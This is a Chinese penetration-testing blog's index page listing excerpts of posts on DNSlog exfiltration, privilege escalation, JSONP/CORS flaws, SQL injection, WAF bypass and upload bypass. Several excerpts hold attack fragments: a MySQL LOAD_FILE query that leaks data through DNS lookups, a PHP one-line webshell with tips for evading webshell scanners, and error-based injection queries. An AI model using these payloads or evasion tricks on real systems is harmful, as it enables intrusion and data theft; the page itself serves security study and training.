渗透测试 - 网络安全,WEB渗透,数据安全,渗透编程,安全培训

如何低成本搭建dnslog服务器

mOon    渗透测试     827次查看    抢沙发    2019年05月18日

DNSLog,简单来说,就是通过记录对于域名的DNS请求,通过dns请求这个相对“隐蔽”的渠道,来委婉地获取到想要获得的信息。 例如,在一个针对mysql数据库的注入中,如果没有回显,可能很多时候就要歇菜。 但如果对方的数据库服务器连接公网并且是Windows机器的话,就可以用这种姿势来获取信息: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT pas...

域渗透(提权篇)

mOon    渗透测试     976次查看    抢沙发    2019年05月11日

域渗透(提权篇) 常见信息收集 dir /a-r-d /s /b                        ...

JSONP与CORS漏洞挖掘

mOon    渗透测试     583次查看    抢沙发    2019年05月10日

前言 本文从笔者自己对同源策略的理解来谈谈与之相关的JSONP劫持和CORS错误配置这两类安全问题。   同源策略(SOP) 同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制.简单说就是浏览器的一种安全策略。 “同源”包括三个条件: ...

Linux提权之SUID

mOon    渗透测试     544次查看    抢沙发    2019年05月10日

Linux提权之SUID 介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上运行任何命令时,它会通过PATH变量来响应用户执行的命令,向shell发送请求以搜索可执行文件。超级用户通常还具有/ sbin和/ usr / sbin条目以便于执行系统管理命令。 SUID属性一般用在可执行文件上,当用户执...

Metasploit框架中的Windows内核漏洞利用提权教程

mOon    渗透测试     535次查看    抢沙发    2019年05月09日

Metasploit框架中的Windows内核漏洞利用提权教程 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此...

绕过WAF继续SQL注入常用方法

mOon    渗透测试     2305次查看    抢沙发    2018年12月07日

绕过WAF继续SQL注入常用方法 Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过。WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是啥。     WAF呢,简单说,它是一个Web应用程序防火墙,其功能呢是用于过滤某些恶意请...

利用符号绕过安全狗/D盾

mOon    渗透测试     2020次查看    抢沙发    2018年12月06日

授之以鱼不如授之以渔 一句话最原始形态: <?php eval($_POST[4]);?> <?php assert($_POST[4]);?> 注意: BaiDu下一eval和assert的区别 eval可以不变量引用,而assert可以;eval可以执行多条语句,assert只能执行一句 在D狗扫描Web后门的时候就会匹配这两个函数 绕过方法:拆封-...

上传绕过WAF的tips大全

mOon    渗透测试     1239次查看    抢沙发    2018年12月06日

上传绕过WAF的tips大全 原始默认状态: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp” Content-Type: text/html 突破0,文件名前缀加[0x09]绕...

十种MySQL报错注入

mOon    渗透测试     1533次查看    抢沙发    2018年11月24日

十种MySQL报错注入 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue...

一些bypass语句

mOon    渗透测试     3291次查看    抢沙发    2018年06月17日

AF evasion methods for sql Injections I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors...